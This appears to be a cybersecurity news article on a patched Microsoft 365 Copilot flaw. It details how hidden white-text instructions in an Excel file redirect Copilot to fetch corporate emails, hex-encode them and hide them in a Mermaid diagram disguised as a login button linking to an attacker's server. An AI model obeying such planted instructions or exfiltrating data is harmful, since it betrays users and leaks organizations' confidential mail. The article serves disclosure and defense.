A sophisticated vulnerability in Microsoft 365 Copilot (M365 Copilot) that allows attackers to steal sensitive tenant data, including recent emails, through indirect prompt injection attacks.
The flaw, detailed in a blog post published today by researcher Adam Logue, exploits the AI assistant’s integration with Office documents and its built-in support for Mermaid diagrams, enabling data exfiltration without direct user interaction beyond an initial click.
The attack begins when a user asks M365 Copilot to summarize a maliciously crafted Excel spreadsheet. Hidden instructions, embedded in white text across multiple sheets, use progressive task modification and nested commands to hijack the AI’s behavior.
These indirect prompts override the summarization task, directing Copilot to invoke its search_enterprise_emails tool to retrieve recent corporate emails. The fetched content is then hex-encoded and fragmented into short lines to bypass Mermaid’s character limits.
Microsoft 365 Copilot Data Exfiltration Via Deceptive Diagrams
Copilot generates a Mermaid diagram, a JavaScript-based tool for creating flowcharts and charts from Markdown-like text that masquerades as a “login button” secured with a lock emoji.
The diagram includes CSS styling for a convincing button appearance and a hyperlink embedding the encoded email data.
When the user clicks it, believing it’s needed to access the document’s “sensitive” content, the link directs to the attacker’s server, such as a Burp Collaborator instance. The hex-encoded payload transmits silently, where it can be decoded from server logs.
Mermaid’s flexibility, including CSS support for hyperlinks, made this vector particularly insidious. Unlike direct prompt injection, where attackers converse with the AI, this method hides commands in benign files like emails or PDFs, making it stealthy for phishing campaigns.
Adam Logue noted similarities to a prior Mermaid exploit in Cursor IDE, which enabled zero-click exfiltration via remote images, though M365 Copilot required user interaction.
The payload, after extensive testing, was inspired by Microsoft’s TaskTracker research on detecting “task drift” in LLMs. Despite initial challenges reproducing the issue, Microsoft validated the chain and patched it by September 2025, removing interactive hyperlinks from Copilot’s rendered Mermaid diagrams.
The discovery timeline shows that there were challenges in coordination. Adam Logue reported the complete situation on August 15, 2025, after discussions with the Microsoft Security Response Center (MSRC) staff at DEFCON.
After iterations, including video proofs, MSRC confirmed the vulnerability on September 8 and resolved it by September 26. However, M365 Copilot fell outside the bounty scope, denying a reward.
This incident underscores risks in AI tool integrations, especially for enterprise environments handling sensitive data. As LLMs like Copilot connect to APIs and internal resources, defenses against indirect injections remain critical.
Microsoft emphasized ongoing mitigations, but experts urge users to verify document sources and monitor AI outputs closely.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
